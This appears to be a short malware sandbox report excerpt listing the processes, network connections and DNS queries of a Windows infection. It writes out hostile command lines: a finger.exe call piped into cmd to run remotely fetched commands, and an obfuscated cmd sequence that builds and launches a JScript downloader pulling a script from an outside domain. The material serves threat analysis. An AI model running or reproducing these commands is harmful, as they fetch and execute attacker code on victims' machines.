Technical Information
- '<SYSTEM32>\finger.exe' ok@pir1sjxai89.docmaster.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\4KG.js"
- C:\users\public\4kg.js
- 'pi######i89.docmaster.email':79
- 'by#######m9.plonoster21.trade':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'pi######i89.docmaster.email':79
- 'cl###flare.com':443
- DNS ASK pi######i89.docmaster.email
- DNS ASK by#######m9.plonoster21.trade
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@pir1sjxai89.docmaster.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set ESJK=.j&&sET QUMRO=vFxaiarFxai a =Fxai 'scFxairiFxaiptFxai:'; b =Fxai 'hFxaiTtPFxai:'; GFxaietFxaiObjFxaiecFxait(Fxaia+b+'&&sET WEL5=PTBJCPTBJCbyosw2foom9.plonoster21.tradePTBJC?1PT...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p OGAAU="%QUMRO:Fxai=%%WEL5:PTBJC=/%" 0<nul 1>C:\Users\Public\4KG%ESJK%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\4KG%ESJK%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\4KG.js